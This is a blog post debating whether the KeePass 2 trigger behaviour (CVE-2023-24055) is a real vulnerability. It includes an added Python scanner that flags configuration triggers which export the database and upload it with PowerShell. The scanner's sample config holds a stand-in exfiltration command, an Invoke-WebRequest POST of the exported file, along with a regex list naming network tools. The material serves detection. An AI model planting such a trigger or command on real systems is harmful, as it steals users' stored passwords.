
The KeePass 2 vulnerability argument is getting interesting (CVE-2023-24055)

Phillip Kittelson | 05 Feb 23 | 2 min read

Passwords, and the various solutions users rely on to secure them, have been increasingly targeted. A vulnerability in KeePass 2, a popular free and open-source password vault, was recently released with a proof-of-concept (PoC) posted on GitHub by security researcher alt3kx. However, the severity, and even whether the issue is a vulnerability at all, has been contested by the KeePass creator.

The alleged vulnerability is that an attacker with write access to the XML configuration file can use triggers, a feature of KeePass, to export passwords to an XML file and then use PowerShell to exfiltrate those passwords to a remote server through the Invoke-WebRequest cmdlet. Alt3kx's PoC includes code snippets and screenshots showing exploitation of the vulnerability.
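From the defender's side, the chain described above leaves a footprint in the configuration file itself. The following is an added example (not code from the original post or from the KeePass project) that scans a KeePass XML configuration file and flags any trigger whose parameters combine a database export with a PowerShell network command; the element names (Trigger, Name, Parameter) are assumptions about the file layout, and the sample config is constructed.

```python
"""Scan a KeePass.config.xml for triggers matching the CVE-2023-24055 chain.

Added example, not code from the original post or the KeePass project. It
assumes triggers are stored as <Trigger> elements with a <Name> child (the
walk visits every <Trigger> wherever it sits and reads all text beneath it,
so the exact nesting is not relied on). The sample config is constructed.
"""
import re
import xml.etree.ElementTree as ET

# What a defender looks for inside a trigger: a database export action and a
# shell command that reaches the network.
INDICATORS = {
    "export-action": re.compile(r"\bexport\b", re.I),
    "powershell": re.compile(r"powershell", re.I),
    "outbound-request": re.compile(r"invoke-webrequest|\bcurl\b|\bwget\b", re.I),
}

def scan_config(xml_text):
    """Return {trigger_name: [indicator labels]} for every trigger that matches."""
    root = ET.fromstring(xml_text)
    findings = {}
    for trigger in root.iter("Trigger"):
        name_el = trigger.find("Name")
        name = (name_el.text or "").strip() if name_el is not None else "<unnamed>"
        # Flatten every parameter and text node under the trigger into one blob.
        blob = " ".join(t.strip() for t in trigger.itertext() if t.strip())
        hits = [label for label, rx in INDICATORS.items() if rx.search(blob)]
        if hits:
            findings[name] = hits
    return findings

# Constructed sample: a benign trigger, then one that exports the database to
# a file and posts it with PowerShell (the chain the post describes).
SAMPLE_CONFIG = """<Configuration><Application><TriggerSystem>
  <Enabled>true</Enabled><Triggers>
  <Trigger><Name>Lock on idle</Name><Actions><Action><Parameters>
    <Parameter>LockWorkspace</Parameter></Parameters></Action></Actions></Trigger>
  <Trigger><Name>Backup</Name><Actions>
    <Action><Parameters><Parameter>Export</Parameter>
      <Parameter>C:\\Temp\\db.xml</Parameter></Parameters></Action>
    <Action><Parameters><Parameter>powershell.exe</Parameter>
      <Parameter>Invoke-WebRequest -Uri http://example.invalid/up -Method POST -InFile C:\\Temp\\db.xml</Parameter>
    </Parameters></Action></Actions></Trigger>
  </Triggers></TriggerSystem></Application></Configuration>"""

if __name__ == "__main__":
    for name, hits in scan_config(SAMPLE_CONFIG).items():
        print(f"trigger {name!r}: {', '.join(hits)}")
```

Run against a real config, the same scan gives a quick answer to whether any trigger has been planted with the export-then-upload pattern, which is exactly the change a defender wants to alert on if the file is writable by more than the user.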

KeePass developer Dominik Reichl denies that the issue is a vulnerability, since it requires write access to the config file.

While I have not attempted to verify that the vulnerability works, I at least have an opinion on the argument.

Just my Opinion…

I can certainly see the arguments from both sides. The developer is arguing that an attacker who has write access to the config file equals game over from the beginning. This argument does ring true to some extent. An attacker who can physically access a machine is in a better position to compromise the device.

However, this flies in the face of more recent culture changes in cybersecurity, such as implementations of the zero-trust concept. In the days of defense-in-depth, once you were in the network, you were allowed to access just about any resource. Zero trust shuts this down and requires constant authentication and authorization of user activity across a network.

Even physical access to a device does not automatically grant you access to the data on that device. Full-disk encryption solutions, such as Windows BitLocker, prevent someone from using a boot disk, like Hiren's or DaRT, to reset admin passwords or access raw data.

The idea of a password manager allowing anyone without the master password to export those passwords, especially to a remote server, is completely bonkers. Features such as the triggers function, which is used as part of this vulnerability, should be protected or encrypted by default. Dominik needs to rectify the issue.


Tags: KeePass, vulnerability, proof of concept, exploitation, CVE-2023-24055, alt3kx, Dominik Reichl